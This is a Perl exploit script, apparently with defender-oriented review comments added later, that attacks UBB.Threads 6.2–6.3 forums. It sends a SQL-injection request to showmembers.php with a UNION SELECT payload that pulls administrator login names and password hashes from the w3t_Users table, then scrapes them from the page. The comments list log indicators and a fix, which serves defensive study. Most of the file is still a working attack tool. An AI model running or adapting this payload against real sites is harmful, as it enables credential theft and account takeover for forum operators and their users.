#!/usr/bin/perl
use IO::Socket;
########################################
## UBBThreads exploit for admin hash viewing ##
## SQL-injection ##
## coded by ziGGy and Satyr ##
## Bugs found by w00t
##Gr33t1ngz to:Khmelic;Skr4tch;Mazafaka.ru;d.o.b familia;4nd 3v3ry b0dy wh0 kn0w$ u$##
##$0rry f0r 7t1$ 31337 $p34k1ng =P##
## http://www.cyberlords.net ##
########################################
# Usage guard: the script needs two command-line arguments (<host> and
# </folder/>). With fewer, it prints the banner below and exits before any
# network activity takes place.
unless (@ARGV >= 2) {
    my $rule = '#############################################################';
    my @banner_lines = (
        $rule,
        ' UBB.Threads 6.2.*-6.3.* exploit for admin hash viewing',
        ' coded by ziGGy and Satyr',
        ' Cyber Lords Community http://www.cyberlords.net',
        $rule,
        ' Usage:',
        ' cl_ubb.pl <host> </folder/> ',
        '',
        ' <host> - host for attacking',
        ' </folder/> - UBBThreads folder',
        $rule,
    );
    print "$_\n" for @banner_lines;
    exit();
}
# Request stage: opens a plain TCP connection to port 80 of the given host and
# sends one GET for <folder>showmembers.php whose `like` parameter carries a
# UNION SELECT against the w3t_Users table (rows with U_Status 'Administrator').
#
# Reviewer notes for defenders, all taken from the request built below:
#   - Access logs: a showmembers.php request whose `like` value contains a
#     single quote followed by "union SELECT" and ends in "/*".
#   - Headers: a non-standard "Http-Referer" header (not "Referer") pointing at
#     microsoft.com, and the literal User-Agent "Internet Explorer 6.0".
#   - Framing: every request line is terminated with a bare LF.
#   - The usage banner names UBB.Threads 6.2.*-6.3.* as affected; the `like`
#     value evidently reaches a SQL statement unescaped, so the durable fix is
#     a bound/escaped parameter server-side plus upgrading off those versions.
($server, $folder) = @ARGV[0, 1];
print "\nserver : $server\nfolder : $folder\n\n";

$success = 0;
$path_download =
"showmembers.php?Cat=&like=1'%20union%20SELECT%20U_LoginName,U_Registered,U_Extra1,U_Password,U_TotalPosts,U_Extra1,U_Number%20FROM%20w3t_Users%20WHERE%20U_Status ='Administrator'/*";
$GET = "$folder$path_download";

print " Connecting...\n";
$socket = IO::Socket::INET->new(
    Proto    => "tcp",
    PeerAddr => $server,
    PeerPort => "80",
) or die "Connection died\n";
print "Connected!\nSending...\n";

# One write per request line, in the original order. The original also has a
# commented-out "Accept: */*" header, which is never sent.
for my $request_line (
    "GET $GET HTTP/1.1\n",
    "Host: $server\n",
    "Http-Referer: http://microsoft.com\n",
    "User-Agent: Internet Explorer 6.0\n",
    "Pragma: no-cache\n",
    "Cache-Control: no-cache\n",
    "Connection: close\n\n",
) {
    print {$socket} $request_line;
}

# "Success!" only means the request was written; nothing has been read from
# the server at this point.
print "Success!\nHold on...\n\n";
# Response stage: reads the HTTP response line by line and prints selected
# values from the lines between two marker strings.
#
# Reviewer notes for defenders:
#   - What leaks is whatever the server renders for the injected row; the query
#     sent earlier selects U_LoginName and U_Password for administrator
#     accounts, so hashes shown by a successful run should be treated as
#     disclosed and the affected credentials rotated.
#   - The parser is brittle: it depends on the exact marker text and anchor
#     layout of the member-list page, so "exploit failed!!!" on its own does
#     not prove the server is not vulnerable.
#
# State flags (plain globals; the script does not use strict):
$start=0;            # 1 while inside the marked region of the page
$href_num=0;         # running count of "<a href" lines seen inside the region
$next_str_name=0;    # 1 when the next response line should be echoed verbatim
$all_count=0;        # number of extracted values printed so far
while ($answer = <$socket>)
{
# Echo the line that follows an odd-numbered anchor line, then clear the flag.
# presumably this is the line holding the login name - confirm against the page
if($next_str_name eq 1){print $answer;$next_str_name=0;}
# Region markers, matched case-insensitively anywhere in the line.
# NOTE(review): /g in scalar context carries match position between tests on
# the same $answer, so the order of these statements matters.
if($answer=~/CODE LOOP/gi){$start=1;}
# NOTE(review): `break` is not a loop-control statement in Perl; without strict
# it is presumably parsed as a bareword and the loop keeps reading until EOF -
# confirm.
if($answer=~/END OF LOOP/gi){$start=0;break;}
if($start eq 1){
if($answer=~/<a href/){
$href_num++;
# Every second anchor line: strip "http://" from the line and print the href
# value of a link carrying target="new".
# presumably this is where the selected U_Password value is rendered - confirm
if($href_num % 2 eq 0){
$answer=~s/http:\/\///gi;
# The match result is not checked, so on a non-matching line $1 is whatever an
# earlier successful match left behind (or empty).
$answer=~/<a href="(.+)" target="new">/gi;
print $1."\n\n";$all_count++;
}
else{
# Odd-numbered anchor line: ask for the following line to be echoed.
$next_str_name=1;
}
}
}
}
# Nothing was extracted from the marked region.
if ($all_count == 0) { print "exploit failed!!!\n"; }